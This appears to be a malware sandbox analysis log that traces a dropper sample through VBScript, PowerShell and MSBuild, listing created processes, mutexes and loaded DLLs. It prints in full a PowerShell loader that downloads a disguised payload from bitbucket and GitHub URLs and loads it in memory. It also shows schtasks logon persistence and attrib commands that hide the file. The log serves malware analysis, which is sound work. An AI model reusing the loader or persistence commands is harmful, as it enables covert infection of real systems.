                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 67784c48226c6.vbs
                  Source: 3lhrJ4X.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                  Source: unknownProcess created: C:\Users\user\Desktop\3lhrJ4X.exe "C:\Users\user\Desktop\3lhrJ4X.exe"
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 67784c48226c6.vbs
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = [obfuscated base64 string omitted]
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                  Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "Msbuild"
                  Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "Msbuild" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c 67784c48226c6.vbs
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [encoded command line omitted]
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: cabinet.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: feclient.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: textinputframework.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: coremessaging.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: coremessaging.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: textshaping.dll
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Section loaded: advpack.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: scrrun.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cscapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\attrib.exe Section loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exe Section loaded: fsutilext.dll
                  Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: 3lhrJ4X.exe Static PE information: Image base 0x140000000 > 0x60000000
                  Source: 3lhrJ4X.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 3lhrJ4X.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 3lhrJ4X.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 3lhrJ4X.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
